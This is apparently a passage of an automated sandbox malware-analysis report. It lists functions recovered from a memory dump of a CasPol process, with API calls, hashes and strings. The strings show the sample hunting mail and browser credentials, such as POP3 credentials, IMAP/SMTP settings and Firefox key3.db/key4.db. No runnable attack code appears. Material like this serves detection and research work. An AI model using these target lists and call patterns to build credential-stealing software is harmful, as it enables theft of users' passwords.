                                                                                                                                                                                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                  Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                  • API String ID: 643879872-978417875
                                                                                                                                                                                  • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                  • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                  • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                  • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                  Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                  • String ID: user_pref("
                                                                                                                                                                                  • API String ID: 765841271-2487180061
                                                                                                                                                                                  • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                  • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                  Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                  • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                                  • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                  • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                  Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                  • API String ID: 1631269929-4153097237
                                                                                                                                                                                  • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                  • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                  • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                  Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                  • API String ID: 524865279-2190619648
                                                                                                                                                                                  • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                  Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                  • String ID: key3.db$key4.db
                                                                                                                                                                                  • API String ID: 581844971-3557030128
                                                                                                                                                                                  • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                  • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                  Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 2300387033-3849865405
                                                                                                                                                                                  • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                  Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                                                                                  • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                  • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                  Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  • API String ID: 125969286-791839006
                                                                                                                                                                                  • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                  Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                                                                                  • API String ID: 2923679083-4161923789
                                                                                                                                                                                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                  Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                  • unknown error, xrefs: 004277B2
                                                                                                                                                                                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                  • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                  • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                  • API String ID: 3510742995-3035234601
                                                                                                                                                                                  • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                  • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                  • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                  Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                  • API String ID: 2221118986-3608744896
                                                                                                                                                                                  • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                  • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                  Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                    • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemcpy
                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                  • API String ID: 1784268899-4153596280
                                                                                                                                                                                  • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                  • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                  Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                  • memset.MSVCRT ref: 00410246
                                                                                                                                                                                  • memset.MSVCRT ref: 00410258
                                                                                                                                                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                  • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3974772901-0
                                                                                                                                                                                  • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                  Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                  • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 577244452-0
                                                                                                                                                                                  • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                  Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                  • String ID: imap$pop3$smtp
                                                                                                                                                                                  • API String ID: 2025310588-821077329
                                                                                                                                                                                  • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                  Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
